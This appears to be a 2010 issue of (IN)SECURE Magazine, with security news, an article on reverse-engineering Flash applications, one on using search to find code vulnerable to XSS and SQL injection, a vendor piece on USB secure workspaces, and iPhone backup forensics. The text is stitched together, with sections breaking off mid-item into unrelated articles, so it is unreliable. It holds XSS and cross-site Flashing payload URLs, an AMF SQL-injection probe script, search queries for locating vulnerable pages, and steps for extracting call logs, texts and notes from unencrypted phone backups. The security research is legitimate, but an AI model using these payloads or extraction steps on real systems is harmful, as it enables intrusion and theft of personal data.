Itʼs been quite a ride since the April issue of (IN)SECURE. Weʼve been to Infosecurity Europe in London and met some of our dedicated readers across the Channel. We took in the sun at the IBM Innovate 2010 conference in Orlando and learned more about the future of information security and other transformations coming to many aspects of our computing-fueled lifestyle. As this issue is released, weʼre looking forward to going to the US for one of the premier technical events of the year - Black Hat Briefings & Training 2010. If youʼre in Las Vegas, donʼt forget to join us for drinks at the Qualys party on July 28 at the Jet - itʼs going to be amazing! A big thanks goes to everyone who submitted their material for this issue; there are truly a lot of talented people in the information security field. Keep it coming!

Mirko Zorz, Editor in Chief
Visit the magazine website at www.insecuremag.com
(IN)SECURE Magazine contacts Feedback and contributions: Mirko Zorz, Editor in Chief -
[email protected] News: Zeljka Zorz, News Editor -
[email protected] Marketing: Berislav Kucan, Director of Marketing -
[email protected]
Distribution: (IN)SECURE Magazine can be freely distributed in the form of the original, unmodified PDF document. Distribution of modified versions of (IN)SECURE Magazine content is prohibited without explicit permission from the editor.
Copyright HNS Consulting Ltd. 2010. www.insecuremag.com
Google now supports encrypted search Google just rolled out SSL encryption to Google Search. The option is currently in beta, therefore the users aren't automatically transferred to https. Over the years, Google started adding SSL capabilities to their portfolio of online products, most notably making it the default option for all Gmail users in early 2010. (www.net-security.org/secworld.php?id=9323)
Wi-Fi security patent granted for dynamic authentication and encryption Ruckus Wireless has been granted a patent by the USPTO for an innovation that simplifies the configuration, administration and strength of wireless network security. The new technique effectively eliminates tedious and time-consuming manual installation of encryption keys, passphrases or user credentials needed to securely access a wireless network. (www.net-security.org/secworld.php?id=9326)
Findings of the Q1 2010 State of the Web security report Zscaler's newly released Q1 2010 State of the Web report details the enterprise threat landscape and the variety of Web-based issues plaguing Internet users. Among numerous findings, the report details several growing threat vectors, including attackers leveraging search engines and growing fake anti-virus threats. (www.net-security.org/secworld.php?id=9335)
Q&A: Symantec's acquisitions and the future Francis deSouza is senior vice president of the Enterprise Security Group at Symantec. In this interview he discusses Symantec's recent acquisitions, how they mitigate cloud computing and social networking threats, as well as Symantec's plans for the near future. (www.net-security.org/article.php?id=1442)
Critical vulnerabilities in Photoshop CS4 Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for Windows and Macintosh that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system. A malicious .ASL, .ABR, or .GRD file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit these vulnerabilities. (www.net-security.org/secworld.php?id=9350)
Critical iPhone security issue leaves your contents exposed Bernd Marienfeld has discovered that the passcode protection can be bypassed by simply connecting the iPhone 3GS in question to a computer running Ubuntu 10.04. According to him, the iPhone can be tricked into allowing access to photos, videos, music, voice recordings and Google safe browsing data.

But an attacker can cause XSS by passing a value like the one below:

http://www.example.com/Banner.swf?clickTAG=javascript:alert('XSS')

D. Exploit by ʻasfunctionʼ used in conjunction with unsafe Flash methods

The asfunction protocol handler is similar to the JavaScript protocol handler: asfunction causes a function in the Flash file to be executed. However, there are a few unsafe functions in Flash, listed below:
- loadVariables()
- loadMovie()
- getURL()
- loadMovieNum()
- FScrollPane.loadScrollContent()
- LoadVars.load()
- LoadVars.send()
- LoadVars.sendAndLoad()
- MovieClip.getURL()
- MovieClip.loadMovie()
- NetConnection.connect()
- NetServices.createGatewayConnection()
- NetStream.play()
- Sound.loadSound()
- XML.load()
- XML.send()
- XML.sendAndLoad()

An example of the script code would be:

loadMovie(_root.URL)

When such a function is intended to call upon other domains, it becomes unsafe, because the parameter can be exploited easily in the following manner:

http://www.example.com/test_flash.swf?URL=asfunction:loadMovie,javascript:alert('XSS')

All the other methods listed above can cause XSS in Flash-driven RIAs in similar ways. It is possible to dump the file, discover the respective pointers and analyze it in ways similar to the ones described for the getURL case earlier; a small helper that scans SWFDump output for these methods is sketched below.
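As an illustration of that workflow, here is a minimal, hypothetical Python helper that greps a SWFDump text dump for the unsafe methods listed above. The dump file name and the exact formatting of SWFDump's output are assumptions; in practice you would adapt the patterns to whichever disassembler you use.

```python
import re
import sys

# Methods from the list above that can lead to XSS/XSF when
# their parameters are attacker-controlled.
UNSAFE_METHODS = [
    "loadVariables", "loadMovie", "getURL", "loadMovieNum",
    "loadScrollContent", "LoadVars.load", "LoadVars.send",
    "LoadVars.sendAndLoad", "NetConnection.connect",
    "createGatewayConnection", "NetStream.play",
    "loadSound", "XML.load", "XML.send", "XML.sendAndLoad",
]

def scan_dump(path):
    """Print every line of a SWFDump output file that mentions an unsafe method."""
    pattern = re.compile("|".join(re.escape(m) for m in UNSAFE_METHODS))
    with open(path, errors="replace") as dump:
        for lineno, line in enumerate(dump, 1):
            if pattern.search(line):
                print(f"{path}:{lineno}: {line.rstrip()}")

if __name__ == "__main__":
    # Usage: python scan_swfdump.py dump.txt  (dump.txt produced beforehand with SWFDump)
    scan_dump(sys.argv[1])
```

Each hit is a candidate sink whose parameter source then has to be traced back through the disassembly by hand.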
Case Study 2: Cross-Site Flashing with RIA

XSF (Cross-Site Flashing) is very similar to an XSS attack. The basic concept of XSF is the loading of one movie by another movie. Here the application is designed to load only a safe .swf file, specifically from its own server. But if an XSF point is discovered, an attacker exploits it by forcing a file from an untrusted domain to be loaded. By using an XSF attack, the attacker can:

• Load an XSS-vulnerable Flash file, or
• Cause a phishing attack.

The same functions as the ones listed above can lead to such XSF attacks. For example, consider an application that has code such as:

loadMovieNum(_root.moviename, 1);

An attacker here would inject his own movie and craft the URL to become:

http://www.example.com/XSF?moviename=http://www.xyz.com/xss.swf

If the .swf file is dumped and the method searched for, this attack can be discovered.

Case Study 3: Embedded SWF files within other SWF files - deeper reverse engineering

In many cases, certain .swf files are built to defeat a shallow level of disassembly. To avoid being caught by reverse engineers, the malicious code is planted as a .swf file embedded in another .swf file. The parent file is designed to look relatively simple and harmless; only on closer inspection is the manipulation discovered. Once caught, the reverse engineering process can be applied recursively to the child .swf file, and through many such levels the final malicious file can be hidden, and found, as well. The main purpose of this case study is to show the recursive aspect of the reverse engineering approach.

Consider an .swf file like the one mentioned above, where the malicious code is not directly visible in the output of the first dump. Running SWFDump on it merely gives an output where one can see that a large list of bytes has been pushed directly onto the stack by commands like:

xxxxx) + Y:Z pushbyte XX

The bytes could continue to be pushed in large numbers; consider a case where they are then stored in some array by commands such as:

xxxxx) + Y:Z newarray wwwww params
xxxxx) + Y:Z setproperty [public]::array

where, in all three commands above, x, Y and Z denote individual integers (likely with different values in each command).
When looking for the "array" in the remaining dump, one may find the mechanism that uses these bytes and decrypts them, for example with a string key stored up front and a regular XOR loop, or some similar scheme. The pushes can therefore be extracted into a separate file and analyzed, and the pushed bytes written out to their own file. By studying the code found around the part that decrypts the "array", it is usually not difficult to guess the kind of decryption used. Hence, a script in Perl, Python or a similar language can be written by hand to decrypt the extracted bytes, imitating the routine found in the parent SWFDump output; a rough sketch of such a helper follows below.

On decrypting, the result could be another .swf file, and a second SWFDump run on this file is then required. If large hex strings are found being pushed into the local registers in one of these dumps, they can be analyzed by converting them to a binary file with another small script. It would not be surprising if these large hex strings were additional .swf files themselves.
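The following Python fragment is a hedged illustration of that step, assuming the simplest case described above: the embedded payload was built by XOR-ing each byte against a repeating string key recovered from the disassembly. The key and file names are placeholders, and a real sample may use a different scheme entirely.

```python
# decrypt_pushed_bytes.py - illustrative only; adjust to the scheme seen in the dump.
KEY = b"placeholder_key"   # string key recovered from the parent SWF's decryption loop

def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Reverse a repeating-key XOR loop like the one observed in the disassembly."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

if __name__ == "__main__":
    # pushed_bytes.bin holds the raw byte values extracted from the pushbyte instructions.
    with open("pushed_bytes.bin", "rb") as f:
        payload = xor_decrypt(f.read(), KEY)

    with open("decrypted_child.swf", "wb") as out:
        out.write(payload)

    # Quick sanity check: uncompressed SWF files start with 'FWS', compressed ones with 'CWS'.
    print("Looks like a SWF file" if payload[:3] in (b"FWS", b"CWS") else "Not an obvious SWF header")
```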
At some point, SWFDump may fail to parse cleanly when it hits exploit-containing code. Hereafter, with some knowledge of what to look for and of the opcodes SWFDump cannot parse, it is possible to work through the problem manually; for example, the opcodes can be read as an .asm file and the mechanism of the exploit analyzed from there.

The crux of this study is that reverse engineering may not always stop at level 0. Depending on the first output, the suspicious code that does not make sense must be re-analyzed and, if need be, extracted with small scripts and then reverse engineered once again.

II. Protocol analysis

It is also possible to identify the service points and server-side access points from Flash components. The Flash component in question may be communicating over AMF, JSON or XML with these back-end components (as discussed in the previous section on architecture). These back-end streams can be fuzzed, and the attacker can discover a potential vulnerability. For example, consider the following login component (written using Flex).
Figure 9 – Simple login in Flex.
We can dump this .swf with SWFDump and look for the service point in this example:
Figure 10 – Flash message brokerʼs end points.
The message brokerʼs end point can be identified, and the stream can thereafter be either reconstructed or manipulated through a proxy. For example, Charles Proxy provides AMF decoding, and the following screenshots describe its working mechanism.
Figure 11 – AMF passing username and password admin/admin.
At this point it is easy to fuzz the stream and a simple single quote can be passed as shown below.
Figure 12 – Adding quote in the request.
Here is the response, along with the stack trace:
Figure 13 – Stack trace showing injection.
Here, the stack trace shows a possible SQL injection. An attacker can leverage this particular point and exploit the server-side components from here using the AMF stream; a scripted version of this probe is sketched below.
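For readers who would rather script this probe than click through a proxy, the sketch below shows one way it might be done in Python with the third-party PyAMF library (or a maintained fork of it). The gateway URL, service name and method are assumptions based on the example above, not part of the original write-up, and such probing should only be done against applications you are authorized to test.

```python
# amf_probe.py - send a single-quote payload to an AMF endpoint (illustrative sketch).
from pyamf.remoting.client import RemotingService

# Endpoint and service names are placeholders; take the real ones from the SWF dump.
GATEWAY_URL = "http://www.example.com/messagebroker/amf"

gateway = RemotingService(GATEWAY_URL)
login_service = gateway.getService("LoginService")

# A lone quote is often enough to surface a SQL error in the returned stack trace.
response = login_service.login("admin'", "admin")
print(response)
```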
Conclusion and prospects

In this paper, we have focused on the security analysis of Flash components. The need for security analysis has been explained in the context of the current information era (Web 2.0). An attempt has been made to examine a small set of vulnerabilities, along with applying the discussed approach to tackling them. A second approach, protocol analysis, has also been presented. It is possible to extend the same approaches to look for other security loopholes, such as:

• Assumptions about client behavior. For example, expecting the client to enter only plain text in a text field, and hence providing no validation, is too simplistic and leaves a major loophole: the client may inject executable JavaScript code into the same text field.

• Disclosure of business logic and secrets on the client side, i.e. the username-password authentication logic may have been deployed as client-side ActionScript in the .swf file itself. In such a case, a simple decompiler like SWFScan can be used to reverse engineer the .swf file, and this, in turn, gives away ActionScript that contains cleartext username-password combinations.

There are many such avenues for the use of reverse engineering on Flash-based Rich Internet Applications. The idea of this paper is to open readers' eyes to reverse engineering and protocol analysis based Flash security, with enough examples and tools that individuals can consider this approach and adapt it to their own scenarios.
Rishita Anubhai is a Web Security Researcher at Blueinfy. Shivang Bhagat is a Security Consultant at Blueinfy.
What is a log? Without getting too philosophical, a log is a record of some activity occurring at or observed by an information system or application. Sometimes a collection of such log messages will also be called a log or a log file. Given this definition, the log

... + request.getParameter("Category") + ... order ...
rs = stmt.executeQuery(query);
Finding Cross-Site Scripting (XSS) vulnerabilities

In this next example, locating a page that contains XSS vulnerabilities is just as achievable as in our previous example. In this instance, the search explicitly locates files of your choice; this example narrows our search to "index.jsp" exclusively.
inurl:index.jsp intext:request.getparameter()

Our search criteria returned a number of results that located "index.jsp" pages using the getParameter API, which returns the value of a request parameter passed in the query string. A manual review of 10 pages revealed 67 XSS (persistent and reflected) vulnerabilities.
UFirstName = request.getParameter("FirstName");

The examples provided show how easy it is to locate vulnerabilities, and the vulnerability search is not limited to XSS and SQLi. Using other unsafe APIs will produce the same results: OS command execution (Runtime.getRuntime), or vulnerabilities associated with other languages such as PHP, Perl or ASP (for instance, inurl:default.asp intext:Response.Write).

The benefit of reviewing source code is proved when one attempts to bypass protective measures. For instance, being able to review the constructed input validation makes it possible to evade that validation. In addition, source code comments help to explain the internal workings of the application and to identify business logic vulnerabilities.

I like the saying "What is old is new again". When you think about it, the techniques described within this article use the same approach we have been witnessing for years, but with the added ability to locate vulnerabilities "under the radar".
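To close the loop on the examples above, here is a small, hedged Python sketch of how a reviewer might confirm that a parameter found this way is actually reflected without encoding. The URL and parameter name are placeholders drawn from the article's example pattern, and such probing should only be run against applications you are authorized to assess.

```python
# reflect_check.py - probe a single parameter for unencoded reflection (authorized testing only).
import urllib.parse
import urllib.request

MARKER = "xssProbe12345"   # harmless, unlikely-to-occur string

def is_reflected(base_url: str, param: str) -> bool:
    """Return True if the marker comes back verbatim in the response body."""
    query = urllib.parse.urlencode({param: MARKER})
    with urllib.request.urlopen(f"{base_url}?{query}", timeout=10) as resp:
        body = resp.read().decode(errors="replace")
    return MARKER in body

if __name__ == "__main__":
    # Placeholder target reflecting the index.jsp / request.getParameter example.
    print(is_reflected("http://www.example.com/index.jsp", "FirstName"))
```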
Jerry Mangiarelli is an IT Security Specialist with TD Bank Financial Group. He has spent the last 9 years assessing and researching web applications. He continues to present his research techniques and results at many seminars and conferences, such as EC-Council, SecTor and Federation of Security Professionals.
SOURCE Barcelona 2010 (www.sourceconference.com) Barcelona, Spain, 21-22 September 2010. Use discount code SOURCEHN10 to get 15% off your ticket price.
Brucon 2010 (www.brucon.org) Brussels, Belgium. 24-25 September 2010. RSA Conference Europe 2010 (bit.ly/rsa2010eu) London, United Kingdom. 12-14 October 2010.
InfoSecurity Russia 2010 (www.infosecurityrussia.ru) Moscow, Russia. 17-19 November 2010.
Securecomm 2010 (www.securecomm.org) Singapore. 7-10 September 2010.
Gartner Security & Risk Management Summit (europe.gartner.com/security) London. 22-23 September 2010.
2nd International ICST Conference on Digital Forensics & Cyber Crime (www.d-forensics.org) Abu Dhabi, UAE. 4-10 October 2010.
ISSE 2010 (www.isse.eu.com) Berlin, Germany. 5-7 October 2010.
GRC Meeting 2010 - Lisbon/Portugal (www.grc-meeting.com) Lisbon, Portugal. 28-29 October 2010.
Infosecurity Europe is held every year in London. The event provides a free education program and exhibitors showcasing new and emerging technologies, offering practical and professional expertise. (IN)SECURE Magazine was at the show, and here are some images from the show floor.
This year's show was the busiest and most successful show to date with 324 exhibitors on the show floor and 12,556 unique visitors through the door (excludes exhibitors and repeat visits).
The keynote program addressed the security issues and pressures that organizations face in an increasingly mobile and global working environment. Leading security experts, industry innovators and speakers from the end-user community provided expert analysis, real-life case studies, strategic advice and predictions. The program included speakers from eBay, Lloyds, Camelot, Lufthansa, Network Rail and Barclays.
Remote workers dream of accessing their files and applications anytime, anywhere. But how do you stop that dream from becoming a security nightmare? Hereʼs a look at the evolution of secure virtual workspaces.

Over the past decade, enterprises have experienced a significant increase in workforce mobility. Employees routinely connect to their offices from home PCs via VPN connections, use wireless hotspots in airports, and receive work emails on smartphone devices. Whatʼs more, organizations are offering access to partners and contractors. While this drive for "anytime, anywhere" access to applications and resources offers advantages in terms of productivity and efficiency, it also introduces a number of significant security risks to the enterprise.

First, thereʼs the diversity of remote access methods being used for business. Some employees will use company laptops or home PCs to connect to the office via VPN links; some will process work emails on smartphones or handheld devices. Another group may use wireless hotspots or Internet kiosks in public areas, or log in from PCs at partner or customer sites.
Some of these remote endpoints are fully managed and under the control of the business IT team; others may be completely insecure and unmanaged. Extending secure access across this wide range of methods and devices is a headache for any organization.

Second, enterprises need to protect their sensitive company or customer data against the risk of data breaches. Corporate laptops and smartphones are all too easily lost or stolen, and often lack encryption, making them easy prey for thieves. Information such as passwords, login credentials and sensitive files can be left behind on untrusted devices at the end of a remote access session, making it available to subsequent users. And of course thereʼs the ever-present threat of malware, spyware and malicious attacks, both from the web and from unsecured PCs.

Last, but by no means least, thereʼs the sheer cost of owning and managing a fleet of corporate laptops or portable devices to allow mobile working. These costs include the purchase price, software licensing, security applications, managing updates and patches, repairs and replacements, and so on.

The checklist for remote working

Businesses need a solution that:

• Gives flexible and secure access to information resources and applications from almost any location and type of PC.

• Keeps sensitive data secure at all times against loss, theft or hacking.

• And is cheaper to deploy and manage than a traditional laptop PC, to help reduce the total cost of ownership (TCO).
Ideally, the solution should also work seamlessly and transparently for remote workers, so they can use their time productively. Users shouldnʼt have to waste time on issues such as unnecessary re-authentication or connection problems when using VPNs, nor should they have to remember to encrypt individual files or documents when copying or saving their work. The solution must also be unobtrusive in action, so it doesnʼt interfere with the userʼs activities, while applying security to protect against external threats and the userʼs own mistakes or oversights.

Meeting this checklist of requirements could be fearsomely complex if conventional point security products were used – such as separate VPN, anti-virus, encryption, personal firewalling and intrusion prevention.

However, the introduction of virtualization technology in recent years has led to the development of a new approach, which greatly reduces the complexity of remote access security while simplifying central management and ergonomics for the user. This is the secure workspace concept.

Endpoint security on demand

This concept was first introduced some four years ago, as a feature on advanced remote access gateways. These gateways were able to deliver ʻendpoint security on demandʼ to the userʼs remote PC by combining two processes: endpoint compliance and secure workspace.

The endpoint compliance process includes:

• Policy enforcement — the gateway scans the remote PC prior to granting access, and enforces access policies according to the results of the scan. This enables access rights to be matched to the level to which the remote PC can be trusted, based on factors such as whether security software like anti-virus and firewall applications is installed and running, and whether the latest Windows patches have been installed.

• Guest computer security checks — once policy enforcement is complete, a remote malware scan can be performed to identify and remove keystroke loggers, Trojan horses and crimeware.

If the remote PC passes the endpoint compliance process, the secure workspace is established, to give session confidentiality through the VPN tunnel. This includes:

• An encrypted SSL VPN session with the remote PC, to protect data input and processed while connected. This ensures that no usable information remains on the PC when the session ends.

• Cache cleaning on the remote PC at the sessionʼs end, to erase browser history, downloaded files, clipboard items and so on. Together with encryption, this helps to remove most traces of the session.

However, while this on-demand approach is very useful in both enforcing security and enabling relatively flexible remote access, it isnʼt a perfect solution. What happens if the remote computer doesnʼt pass the endpoint compliance scan, and isnʼt allowed to connect to the corporate network? In that case, the user cannot access the data or applications that they need, inhibiting their ability to work – unless they can find an alternative PC that meets compliance requirements.

Another issue is that the remote session only gives VPN access to certain permitted applications. It doesnʼt give the user access to their desktop PC as if they were actually in the office.

Online and offline security

Whatʼs needed is an extension of the on-demand approach, which enables the user to get secure access to their desktop and the corporate network from any PC, no matter how insecure it is, and no matter what malware or other infections it may be carrying.

Further, if the user cannot set up a VPN session from the remote PC theyʼre using, due to connection constraints for example, why not enable secure offline access to their desktop and data? If this secure workspace can be made easily portable, fully managed and with always-on, tamper-proof encryption, so much the better.
A secure PC in your pocket

For a number of years now, having a personal ʻPC on a flash driveʼ has been an option for users, mainly because multi-gigabyte USB thumb drives are readily affordable. IT magazines, for example, regularly run features on how to create a bootable flash drive that contains your preferred applications and data, allowing you to carry your PC in your pocket.

Because of security concerns, this method has not, until now, been recommended for corporate deployments. Conventional flash drives do not easily support remote access or security applications such as anti-virus and encryption, nor do they support centralized management. However, secure flash drives are now available with on-board, automated hardware encryption. This imposes mandatory access control on all files written to the drive, storing them in a private partition that is strongly encrypted and password-protected. They can also lock down automatically when a specified number of incorrect password attempts is made, to secure stored data in the event of drive loss or theft.

These secure drives also support central management by enterprise IT teams. This means that drive usage can be monitored, complete with records of files written to and from the drives (which helps with re-provisioning new drives for users in the event of loss or theft). Some drives also support remote termination, which renders them unusable if misplaced or stolen.
WHY NOT USE A SECURE DRIVE AS THE PLATFORM FOR A PORTABLE, VIRTUAL WORKSPACE SOLUTION?

Desktop-to-go

Why not use a secure drive as the platform for a portable, virtual workspace solution? When inserted into the USB port of any PC, the solution could transform the host into a temporary, trusted endpoint with a secure VPN connection to the corporate network.

The solution should present the user with the same Windows desktop that they have in their office, complete with preferred shortcuts and access to documents. These files can be manipulated using the host PCʼs office applications, while the userʼs data remains secure in the separate, secure virtual workspace that runs parallel to the host environment. This protects the integrity of both local data and the corporate network, shielding it against malware, hacking attempts and data loss or theft.

But how should the data security components of a secure flash drive be extended to deliver this functionality? How do we enable remote access and secure, sandboxed sessions on the host machine, generated from the userʼs flash drive, while keeping the process simple and transparent for the user? Letʼs take a closer look at how this can be achieved.

Creating the secure, virtual workspace
The goal when creating a virtual workspace is to protect the userʼs session on the host PC by enclosing it in a "bubble of security" as soon as the session starts up. In this case, the session starts when the user inserts their secure USB drive into the host machine. The secure flash driveʼs firmware would contain both a login program and a virtualization engine. Upon insertion, the login program launches and is granted access to the flash drive firmware, where the userʼs sensitive information is stored. The user is then presented with a login screen, where they enter their security credentials. Following a successful login, the virtualization engine creates a new virtual file system as the basis for the secure workspace, and an instance of the Explorer.exe file is started within this virtual system. All subsequent processes will be started as "child" processes of this new Explorer.exe file. This allows applications and the VPN session to be controlled inside the newly-created secure workspace on the host PC.
This process, called precision emulation, means there is no large installation on the host PC and much lower system memory consumption. In turn, this boosts performance and means there is no need for the user to track or manage multiple operating systems or file systems. The virtualization engine automatically maintains the virtual system it creates.

Precision emulation and hooking

The Microsoft Windows NT dynamic-link library (NTDLL) acts as a barrier between the user environment and the host PCʼs system kernel. The precision emulation process performs a special sort of hooking on this barrier, intercepting application code execution before it reaches NTDLL. This process redirects all file and registry input/output (I/O) calls for the applications being used inside the secure workspace – such as web browsing, word processing, spreadsheets and so on – to the userʼs flash drive.

This means all applications running inside the new secure virtual workspace, including the new Explorer.exe, operate in a virtual file system and registry. The virtual files and all registry data are written to the flash drive instantly and immediately encrypted. If an application requests file creation inside the secure workspace, the CreateFile Win32 API function is called; this call is intercepted and the file is actually created within the flash driveʼs file system. In effect, a secure channel to the applications stored on the host PC is created: the hostʼs applications can be used to create and edit files, but data is not transferred to, nor available on, the host PC.

This special hooking does not require the installation of a driver component, which dramatically reduces the potential for conflicts between the secure virtual workspace and the software applications on unmanaged computers. In this architecture, the memory spaces of applications within the secure workspace and those of ordinary applications on the host PC are not separated, which avoids memory conflicts.
In addition to NTDLL, several other Microsoft Windows dynamic-link libraries are hooked in the same manner, to provide additional security.

Data defenses: Leaving no traces

The methods described above show how the secure, virtual workspace is created and managed, enabling the user to take advantage of the host PCʼs applications while ensuring the userʼs data never touches the host. When the user ends the session, the secure virtual workspace disappears, and because all user and registry data is written to the flash drive and encrypted, never reaching the host PC, no trace of the session or of the VPN connection remains. Even when the solution is not in use, all sensitive user information is encrypted on the flash drive, so user credentials, information contained in documents and other sensitive data remain protected if the device is lost.

Additional desirable features include anti-keylogging, to protect against malware on the host PC that may record keystrokes, and the ability to enforce and manage specific security policies. Policies should cover the copying of files from the secure workspace to the host PC, the printing of files, and the use of certain applications.

The key to plug-in security

With this solution, enterprises can provide employees, contractors and partners with a consistent, controlled, encrypted and secure virtual workspace, completely independent of the host computer. Security teams have the ability to enforce mandatory access control on all files, which are stored in a hardware-encrypted, password-protected partition to enable compliance with privacy regulations. This USB-based solution is far less expensive to purchase and manage than a fleet of laptops, and automatically applies and enforces security without the userʼs intervention. All together, it delivers a pocket-sized, secure work environment, whether the user is online or offline.
Nick Lowe is head of Western Europe sales for Check Point (www.checkpoint.com). He is an expert across IT security, from technology development and evolving threats to compliance and security reporting.
iPhones have been in use for a while now, and many are backing them up to either their own machines or to a machine owned by their current employer. I'm here to talk about an option you are offered when backing up your iPhone – the Encrypt iPhone backup:
I have an iPhone with a few applications installed, and I regularly sync it with my MacBook Pro. I have a lot of contacts, calendar entries and various application data on the iPhone. One day, my car and everything inside it is stolen - including my MacBook. Unfortunately for me, the thieves are not just computer savvy, they're part of a large crime syndicate that's been targeting not just me but my entire organization for a while now. They know that I am in charge of the security team that safeguards my company's secrets, and they know that I am a Mac/iPhone user because I have mentioned it in various posts, tweets and regular Facebook updates.
Getting started

I don't use my MacBook for work, so it is not protected quite as well as my work machine. It is also not protected by FileVault, because I prefer the simplicity of Time Machine as a backup solution. When I first synced my new iPhone with my Mac, I did not check the box that said "Encrypt Backups...". Consequently, the ~/Library/Application Support/MobileSync/Backup/xxx directory holds the unencrypted backup files for my iPhone.
Basic structure and files

The xxx portion of the directory structure is a unique identifier for my iPhone. It is not related to the IMEI number or anything as dubious as that, but it can be matched to the iPhone. Within that directory, a very large number of files (made up primarily of .mdinfo and .mddata files) is stored. There are also three files that stand out like a sore thumb:

Info.plist
Manifest.plist
Status.plist

But more on those later. First of all, let's take a look at those .mdinfo and .mddata files. There are enough of them to warrant a quick exploration with some bash/sed/awk/file magic:
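The original article showed the raw shell output at this point. As the screenshot is not reproduced here, the hedged Python sketch below performs roughly the same survey, tallying what the `file` utility makes of each backup entry. The backup path follows the directory quoted above, with a placeholder device identifier.

```python
# survey_backup.py - rough Python stand-in for the bash/sed/awk/file one-liners.
import collections
import pathlib
import subprocess

# Placeholder identifier; use the real 40-character directory name from MobileSync/Backup.
BACKUP_DIR = pathlib.Path.home() / "Library/Application Support/MobileSync/Backup/xxx"

def survey(backup_dir):
    """Run `file` over every entry and count the reported types."""
    types = collections.Counter()
    for entry in backup_dir.iterdir():
        out = subprocess.run(["file", "-b", str(entry)],
                             capture_output=True, text=True).stdout.strip()
        types[out] += 1
    return types

if __name__ == "__main__":
    for file_type, count in survey(BACKUP_DIR).most_common():
        print(f"{count:6d}  {file_type}")
```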
It seems that there are quite a few different files here. The images could be somewhat intriguing, but it's the SQLite databases and XML documents that will prove to be the most interesting.

Luckily for me, the file names don't give anything away. The file extensions are related, though: a quick Google search can tell the thieves that each .mdinfo file has a related .mddata file, and that they're created by the iPhone/iTunes backup process.

Take the ffe6ddb2ac75ba5b561690c59aafdf5b6001bce4.mddata file as an example. A quick "file" on it reveals "JPEG image data, EXIF standard", which indicates that the file is indeed a JPEG. If "strings" is run on the related .mdinfo file, interesting information comes to light: one can clearly see a file name with the associated path in that output, which leads to the assumption that this is an image taken with the iPhone camera. It still doesn't provide information such as geo-location data, but I'm sure the EXIF data will be a veritable treasure trove.

Plist files: friend, enemy or just a very noisy neighbor?

Before we dig any deeper into the backup files and start poking around the SQL databases, let's take a look at those three files we flagged at the very beginning. First off, we have the Info.plist file. For those of you who are new to the OS, a plist file is a "Property List" file and holds information about applications and the like. In this case, it holds various information about my iPhone. It's a simple, easy-to-read, XML-formatted file from which a lot of information about the iPhone can be learned:

• Build Version
• Device Name
• IMEI number
• Last Backup Date
• Serial Number
• Target Identifier (which matches our backup directory magic number)
• iTunes Version

A short example of pulling these keys out programmatically is sketched below.
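Python's standard library can read these property lists directly. The fragment below is a hedged illustration, again using the placeholder backup directory; the key names are written as they commonly appear in Info.plist, and any that are missing are simply skipped.

```python
# read_info_plist.py - dump a few interesting keys from an iPhone backup's Info.plist.
import pathlib
import plistlib

BACKUP_DIR = pathlib.Path.home() / "Library/Application Support/MobileSync/Backup/xxx"

with open(BACKUP_DIR / "Info.plist", "rb") as f:
    info = plistlib.load(f)

# Key names as they commonly appear in Info.plist; missing keys are skipped.
for key in ("Build Version", "Device Name", "IMEI", "Last Backup Date",
            "Serial Number", "Target Identifier", "iTunes Version"):
    if key in info:
        print(f"{key}: {info[key]}")
```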
There are also a bunch of base64-encoded blobs within the plist file. Free beers to the person who can decode them and tell (IN)SECURE Magazine what they contain (beer will be provided by the author and not the magazine).

Next up is the Manifest.plist file. It contains four keys:

• AuthSignature
• AuthVersion
• Data
• IsEncrypted

This file is used as a manifest for the backups, to check for file corruption. Again, it looks like the Data portion is encoded in base64, but I haven't had the chance to verify this.

Finally, we have the Status.plist file, which contains one key: Backup Success. It's not really useful for anything other than time-stamping the last successful backup of the iPhone.

The meat and potatoes

Now that we've gone through the basics and found where we can get information about the iPhone (as well as grab any images that were held on the device), it's time to dig into the SQLite databases.
On my backup there were quite a few of them - 37 in total. The SQLite databases hold all sorts of information about applications on the iPhone: the SMS database, the contacts database, as well as things like the Calls database. Since the files are not encrypted, extracting information from them is extremely easy.

The commands we're going to use here are:

.dump - dump the entire database out.
.tables - describe the tables in the database.
SELECT - you should know basic SQL statements by now.

Probably the most interesting thing is the phone call log. If we do a "SELECT * FROM calls", we get the call records back as a table. The logs are all kept in a neat fashion and, what's more, you can see exactly what happened during those calls. Through a little trial and error I came up with the following analysis of the entries. If I am wrong, please feel free to correct me.

Position one is the call number in the database. This will increase sequentially as more calls are made.

Position two is the actual number that was dialed.

Position three is the epoch time when the call was made. A simple bit of Perl (perl -e 'print scalar(gmtime(1256804172)), "\n"') will give you the time in numbers us humans can read.

Position four is the duration of the call in seconds.

I haven't yet been able to figure out position five. It flips between a 4 and a 5, and there doesn't seem to be a relation to the type of call made. If anyone knows the answer to this, please feel free to get in touch with me.

I believe position six to be the status of the call. If the call is missed, the field is filled with "-1". However, when the call is successful it's filled with either 358, 398, 388 or 348. I can't figure out the significance of these numbers, so if anyone has more information, please let me know.

The other SQLite databases of interest are the Notes databases. If you're really lucky, you can find notes on passwords to servers, IP addresses and all the usual stuff people want to store but don't think to store in something that should be encrypted.

There's also the SMS database, which is very similar to the Calls database. It contains fields denoting message status, the number of the sender and the like – a great source of information on your target.

Finally, there are databases on installed applications. Is the iPhone owner using Facebook? The Facebook database has all the contacts of that user. There isn't anything juicy like usernames or passwords, but there are links to the contacts' profile pictures, presumably used by the application to display them - not very useful for anything other than stalking.

Probably the biggest headache with the SQLite databases is that they cannot be easily identified. The file names look like SHA1 hashes, so finding out what a SQLite database contains is a trial and error process. You could script a lot of it, which would make life a lot easier.
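That closing remark about scripting the identification step is easy to act on. Below is a hedged sketch that walks the hash-named backup files, keeps only those that start with the SQLite magic header, and lists their tables so a call log can be told apart from a notes store at a glance. The backup path is the same placeholder used earlier.

```python
# identify_sqlite.py - find SQLite databases among the hash-named backup files and list their tables.
import pathlib
import sqlite3

BACKUP_DIR = pathlib.Path.home() / "Library/Application Support/MobileSync/Backup/xxx"
SQLITE_MAGIC = b"SQLite format 3\x00"

def list_tables(db_path):
    con = sqlite3.connect(str(db_path))
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
        return [name for (name,) in rows]
    finally:
        con.close()

for entry in sorted(BACKUP_DIR.glob("*.mddata")):
    with open(entry, "rb") as f:
        if f.read(16) != SQLITE_MAGIC:
            continue
    print(entry.name)
    for table in list_tables(entry):
        print(f"    {table}")
```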
